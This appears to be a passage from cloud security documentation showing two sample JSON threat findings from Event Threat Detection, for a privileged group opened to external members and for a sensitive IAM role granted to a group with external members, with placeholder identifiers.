{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/groupSettings", "state": "ACTIVE", "category": "Privilege Escalation: Privileged Group Opened To Public", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "privileged_group_opened_to_public" }, "detectionPriority": "HIGH", "affectedResources": [{ "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/groupSettings" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1634774534", "nanos": 7.12E8 }, "insertId": "INSERT_ID" } }], "properties": { "privilegedGroupOpenedToPublic": { "principalEmail": "PRINCIPAL_EMAIL", "groupName": "group:GROUP_NAME@ORGANIZATION_NAME", "sensitiveRoles": [{ "resource": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "roleName": ["ROLES"] }], "whoCanJoin": "ALLOW_EXTERNAL_MEMBERS" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": " https://attack.mitre.org/techniques/T1078" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-10-21T00:02:14.712Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-10-21T00:02:19.173Z", "createTime": "2021-10-21T00:02:20.099Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/groupSettings" } }
Privilege Escalation: Sensitive Role Granted To Hybrid Group
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "cloudresourcemanager.googleapis.com", "methodName": "SetIamPolicy", }, "assetDisplayName": "PROJECT_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Sensitive Role Granted To Hybrid Group", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-12-22T00:31:58.242Z", "database": {}, "eventTime": "2022-12-22T00:31:58.151Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "iamBindings": [ { "action": "ADD", "role": "roles/iam.securityAdmin", "member": "group:GROUP_NAME@ORGANIZATION_NAME", } ], "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_NAME", "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "parent_display_name": "FOLDER_ID", "type": "google.cloud.resourcemanager.Project", "folders": [ { "resourceFolderDisplayName": "FOLDER_ID", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "sensitive_role_to_group_with_external_member" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1671669114", "nanos": 715318000 }, "insertId": "INSERT_ID" } } ], "properties": { "sensitiveRoleToHybridGroup": { "principalEmail": "PRINCIPAL_EMAIL", "groupName": "group:GROUP_NAME@ORGANIZATION_NAME", "bindingDeltas": [ { "action": "ADD", "role": "roles/iam.securityAdmin", "member": "group:GROUP_NAME@ORGANIZATION_NAME", } ], "resourceName": "projects/PROJECT_ID" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" } } } }
What's next
- Learn more about how Event Threat Detection works.
- Learn how to investigate and develop response plans for threats.